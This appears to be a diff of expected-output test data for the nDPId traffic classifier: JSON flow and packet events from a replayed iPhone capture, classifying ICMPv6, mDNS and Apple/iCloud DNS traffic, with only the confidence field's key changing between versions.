00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1582454595354,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":62,"pkt_l4_len":8,"thread_ts_msec":1582454595354,"pkt":"MzMAAAACxGGLNYKpht1gCzl3AAg6\/\/6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAAChQAQyAAAAAA="} -00612{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1582454595354,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00612{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1582454595354,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595839,"flow_last_seen":1582454595839,"flow_idle_time":200000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454595839,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1582454595839,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":128,"pkt_l4_len":74,"thread_ts_msec":1582454595839,"pkt":"MzMAAAD7xGGLNYKpht1gD8z1AEoR\/\/6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAD7FOkU6QBKKFMAAAAAAAEAAAAAAAEIX2hvbWVraXQEX3RjcAVsb2NhbAAADIABAAApBaAAABGUABIABAAOAADmYYs1gqnEYYs1gqk="} -00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595839,"flow_last_seen":1582454595839,"flow_idle_time":200000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454595839,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} 
+00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595839,"flow_last_seen":1582454595839,"flow_idle_time":200000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454595839,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} 00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"iphone.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454596364,"flow_last_seen":1582454596364,"flow_idle_time":140000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1582454596364,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00560{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"iphone.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1582454596364,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":130,"pkt_l4_len":68,"thread_ts_msec":1582454596364,"pkt":"MzMAAAAWxGGLNYKpht1gAAAAAEwAAf6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAAWOgABAAUCAACPAIFJAAAAAwQAAAD\/AgAAAAAAAAAAAAAAAAD7BAAAAP8CAAAAAAAAAAAAAv8d2dAEAAAA\/wIAAAAAAAAAAAAB\/5iinA=="} 
-00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"iphone.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454596364,"flow_last_seen":1582454596364,"flow_idle_time":140000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1582454596364,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"iphone.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454596364,"flow_last_seen":1582454596364,"flow_idle_time":140000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1582454596364,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
00839{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"iphone.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1582454596370,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1582454596370,"pkt":"xGGLNYKpxiwDYGpkCABFAAFILXUAAP8RB83AqAIBwKgCEQBDAEQBNJKvAgEGALeWutEAAAAAAAAAAMCoAhHAqAIBAAAAAMRhizWCqQAAAAAAAAAAAABMdWNhcy1pTWFjLmxvY2FsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqAIBMwQAAU4gAQT\/\/\/8AAwTAqAIBBgTAqAIB\/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1582454596847,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":128,"pkt_l4_len":74,"thread_ts_msec":1582454596847,"pkt":"MzMAAAD7xGGLNYKpht1gD8z1AEoR\/\/6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAD7FOkU6QBKKNMAAAAAAAEAAAAAAAEIX2hvbWVraXQEX3RjcAVsb2NhbAAADAABAAApBaAAABGUABIABAAOAADmYYs1gqnEYYs1gqk="} 00560{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"iphone.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1582454597360,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":130,"pkt_l4_len":68,"thread_ts_msec":1582454597360,"pkt":"MzMAAAAWxGGLNYKpht1gAAAAAEwAAf6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAAWOgABAAUCAACPAIFJAAAAAwQAAAD\/AgAAAAAAAAAAAAAAAAD7BAAAAP8CAAAAAAAAAAAAAv8d2dAEAAAA\/wIAAAAAAAAAAAAB\/5iinA=="} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598204,"flow_last_seen":1582454598204,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454598204,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63381,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1582454598204,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1582454598204,"pkt":"xiwDYGpkxGGLNYKpCABFAABMpW8AAP8RkM7AqAIRwKgCAfeVADUAOH2lldMBAAABAAAAAAAAE3AyNi1rZXl2YWx1ZXNlcnZpY2UGaWNsb3VkA2NvbQAAAQAB"} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598204,"flow_last_seen":1582454598204,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454598204,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63381,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p26-keyvalueservice.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598204,"flow_last_seen":1582454598204,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454598204,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63381,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p26-keyvalueservice.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598205,"flow_last_seen":1582454598205,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454598205,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63143,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1582454598205,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1582454598205,"pkt":"xiwDYGpkxGGLNYKpCABFAABGS9oAAP8R6mnAqAIRwKgCAfanADUAMj\/EHhQBAAABAAAAAAAADXAyNi1mbWZtb2JpbGUGaWNsb3VkA2NvbQAAAQAB"} 
-00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598205,"flow_last_seen":1582454598205,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454598205,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63143,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p26-fmfmobile.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598205,"flow_last_seen":1582454598205,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454598205,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63143,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p26-fmfmobile.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598209,"flow_last_seen":1582454598209,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1582454598209,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1582454598209,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1582454598209,"pkt":"xiwDYGpkxGGLNYKpCABFAABFIREAAP8RFTTAqAIRwKgCAfGmADUAMT0yjvEBAAABAAAAAAAACmdzcGUzNS1zc2wCbHMFYXBwbGUDY29tAAABAAE="} -00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598209,"flow_last_seen":1582454598209,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1582454598209,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gspe35-ssl.ls.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598209,"flow_last_seen":1582454598209,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1582454598209,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gspe35-ssl.ls.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598212,"flow_last_seen":1582454598212,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454598212,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55914,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1582454598212,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1582454598212,"pkt":"xiwDYGpkxGGLNYKpCABFAABEPtIAAP8R93PAqAIRwKgCAdpqADUAMKdbJH8BAAABAAAAAAAACWdzcDg1LXNzbAJscwVhcHBsZQNjb20AAAEAAQ=="} 
-00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598212,"flow_last_seen":1582454598212,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454598212,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55914,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsp85-ssl.ls.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598212,"flow_last_seen":1582454598212,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454598212,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55914,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsp85-ssl.ls.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598246,"flow_last_seen":1582454598246,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1582454598246,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1582454598246,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1582454598246,"pkt":"xiwDYGpkxGGLNYKpCABFAAA\/VFIAAP8R4fjAqAIRwKgCAcc\/ADUAK6bSYEMBAAABAAAAAAAAB2NhcHRpdmUFYXBwbGUDY29tAAABAAE="} -00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598246,"flow_last_seen":1582454598246,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1582454598246,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598246,"flow_last_seen":1582454598246,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1582454598246,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1582454598247,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":252,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":252,"pkt_l4_len":218,"thread_ts_msec":1582454598247,"pkt":"xGGLNYKpxiwDYGpkCABFAADuMPYAAEARw6bAqAIBwKgCEQA19qcA2lqQHhSBgAABAAkAAAAADXAyNi1mbWZtb2JpbGUGaWNsb3VkA2NvbQAAAQABwAwABQABAAARlgAcCWZtZm1vYmlsZQJmZQlhcHBsZS1kbnMDbmV0AMA2AAEAAQAAAA8ABBH4uYzANgABAAEAAAAPAAQR+IMIwDYAAQABAAAADwAEEfiDysA2AAEAAQAAAA8ABBH4g8vANgABAAEAAAAPAAQR+LmkwDYAAQABAAAADwAEEfi5Z8A2AAEAAQAAAA8ABBH4g7LANgABAAEAAAAPAAQR+Lkw"} 
-00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":54,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598205,"flow_last_seen":1582454598247,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454598247,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63143,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p26-fmfmobile.icloud.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.248.185.140"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":54,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598205,"flow_last_seen":1582454598247,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454598247,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63143,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p26-fmfmobile.icloud.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.248.185.140"}} 
00731{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1582454598247,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1582454598247,"pkt":"xGGLNYKpxiwDYGpkCABFAAD6F4oAAEAR3QbAqAIBwKgCEQA195UA5qzeldOBgAABAAkAAAAAE3AyNi1rZXl2YWx1ZXNlcnZpY2UGaWNsb3VkA2NvbQAAAQABwAwABQABAAARlgAiD2tleXZhbHVlc2VydmljZQJmZQlhcHBsZS1kbnMDbmV0AMA8AAEAAQAAADUABBH4uVfAPAABAAEAAAA1AAQR+LkmwDwAAQABAAAANQAEEfi5J8A8AAEAAQAAADUABBH4uQrAPAABAAEAAAA1AAQR+IOrwDwAAQABAAAANQAEEfi5Z8A8AAEAAQAAADUABBH4uYTAPAABAAEAAAA1AAQR+LmN"} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598204,"flow_last_seen":1582454598247,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1582454598247,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63381,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p26-keyvalueservice.icloud.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.248.185.87"}} 
